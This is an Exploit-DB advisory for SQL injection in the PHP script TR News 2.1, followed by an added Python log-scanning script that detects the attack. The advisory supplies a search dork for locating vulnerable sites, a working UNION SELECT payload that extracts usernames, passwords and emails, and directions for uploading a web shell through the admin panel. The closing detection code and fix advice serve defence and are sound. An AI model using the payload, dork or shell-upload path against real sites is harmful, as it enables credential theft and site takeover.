TR News 2.1 - 'nb' SQL Injection

EDB-ID: 5483
Author: His0k4
Type: webapps
Platform: PHP
Date: 2008-04-21

########################################################
#                                                      # 
#  Discovered by : His0k4 {Algerian HaCker}            #
#                                                      #
#  Email : His0k4.hlm[at]gmail[dot]com                 #
#                                                      #
#  Greetz to: All Dz & muslims HaCkeRs  :)               #
#                                                      #
#  Special Greetz:c02,Spym4n,THe-MooRiSH               #
#                                                      #
########################################################
#
#  Script   : Tr Script News v2.1
#
#  Download script     : http://www.easy-script.com/scripts-dl/trscript-21.zip
#
#  Dork        : inurl:news.php?mode=voir
#
#  Vulnerable file    : news.php
#
#  P.O.C
#  http://www.victime.com/[news_path]/news.php?mode=voir&nb=[SQL]
# 
#  Example:
#  http://www.victime.com/[news_path]/news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
#
#  Admin login: /admin
#
#  Note: you can upload a shell from the administrator board by going to this link: "/admin/main.php?mode=ajout_cat". It will be uploaded to "[news_path]/images/icone_cat/shell.php"
#
#############################################################################

# milw0rm.com [2008-04-21]
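
A defender-side log check for the two request patterns this advisory describes (a non-numeric `nb` on `news.php?mode=voir`, and a `.php` file requested from `images/icone_cat/`), as an added example that is not part of the original advisory. It assumes common/combined access-log format and that legitimate `nb` values are non-negative integers; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: legitimate `nb` values are plain non-negative integers.
NB_OK = re.compile(r"\d+")
# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return finding labels for one access-log line (hypothetical helper)."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    path = unquote(url.path).lower()
    findings = []
    if path.endswith("/news.php"):
        # parse_qs percent-decodes values, so encoded payloads are caught too.
        params = parse_qs(url.query, keep_blank_values=True)
        if "voir" in params.get("mode", []):
            if any(not NB_OK.fullmatch(v) for v in params.get("nb", [])):
                findings.append("nb-not-integer")
    # Server-side script requested from the category icon directory.
    if "/images/icone_cat/" in path and path.endswith(".php"):
        findings.append("php-in-icon-dir")
    return findings

def scan(lines):
    """Return (line_index, findings) for every line with at least one finding."""
    hits = [(i, classify(line)) for i, line in enumerate(lines)]
    return [(i, f) for i, f in hits if f]

# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Apr/2008:10:00:01 +0000] "GET /news/news.php?mode=voir&nb=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [21/Apr/2008:10:02:13 +0000] "GET /news/news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2 HTTP/1.1" 200 4876',
    '203.0.113.7 - - [21/Apr/2008:10:02:40 +0000] "GET /news/news.php?mode=voir&nb=-1%2F%2A%2A%2FUNION HTTP/1.1" 200 4876',
    '203.0.113.7 - - [21/Apr/2008:10:09:55 +0000] "GET /news/images/icone_cat/x.php HTTP/1.1" 200 312',
    '192.0.2.10 - - [21/Apr/2008:10:11:00 +0000] "GET /news/images/icone_cat/sport.gif HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOG):
        print(index, ",".join(findings))
```

A non-integer `nb` in the logs is only an indicator; the application-side fix is to cast `nb` to an integer or bind it as a query parameter in `news.php`, and to stop the web server from executing scripts in the upload directory.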